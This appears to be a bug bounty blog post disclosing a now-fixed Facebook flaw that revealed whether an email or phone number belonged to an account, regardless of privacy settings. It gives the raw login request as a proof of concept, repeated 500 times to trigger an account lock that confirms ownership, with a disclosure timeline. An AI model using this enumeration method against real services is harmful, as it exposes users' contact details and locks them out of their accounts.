[Facebook] Determine Email Address and Phone number of Users

 A malicious user could have infer contact point ownership of any User regardless of victim's privacy settings and network relativity.

POC - (attacker on a large network)
Repeat the following request 500 times with target Email Address -
========================================
POST /login/device-based/regular/login/?login_attempt=1&next=https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https://www.instagram.com/accounts/signup/&state={"fbLoginKey":"XXX","fbLoginReturnURL":"/fxcal/disclosure/?next=/"}&scope=email&response_type=code,granted_scopes&locale=en_US&ret=login&fbapp_pres=0&logger_id=f952251a-c6c7-4721-9fa8-1ecc26f9c00d&tp=unspecified&cbt=1650191800804&lwv=100 HTTP/2
Host: www.facebook.com
jazoest=21013&lsd=AVoLtTx7Lyg&api_key=124024574287414&cancel_url=https://www.instagram.com/accounts/signup/?error=access_denied&error_code=200&error_description=Permissions+error&error_reason=user_denied&state={"fbLoginKey":"m0yfbr1fvsgfw6badajyhfvyherr5cb53lm5v1dus0bm1bctc47","fbLoginReturnURL":"/fxcal/disclosure/?next=/"}#_=_&display=page&isprivate=&return_session=&skip_api_login=1&signed_next=1&trynum=1&timezone=450&lgndim=eyJ3IjoxMjgwLCJoIjo3MjAsImF3IjoxMjgwLCJhaCI6NjgwLCJjIjoyNH0=&lgnrnd=040734__ylG&lgnjs=1650191800&email=victim@gmail.com&prefill_contact_point=vitcim@gmail.com&prefill_source=browser_dropdown&prefill_type=contact_point&first_prefill_source=browser_dropdown&first_prefill_type=contact_point&had_cp_prefilled=true&had_password_prefilled=false&encpass=LMAO
========================================

Payload insertion point would be the password object in the request body ( encpass=something_something_encrypted )

Any login request made with target Username or Phone number should throw an error saying -
"You can't log in at the moment
To help keep your account safe, we've temporarily locked it.
Before you try logging in again, check your login info and 
make sure that you're using your usual device on a secure network."
Other Email Address, Phone number or Username would throw an error saying - "Wrong credentials"..
Timeline -
Reported - Sunday, April 17, 2022 
Triaged - Saturday, May 14, 2022
Fixed - Thursday, June 9, 2022
Rewarded - Tuesday, July 19, 2022 [with bonus]

Popular posts from this blog

[Google] Access to BGP server + DOM XSS

[Google] YouTube "restconf" Swagger-UI XSS

[Google] Disclose hidden Blogger profile Display name and Profile photo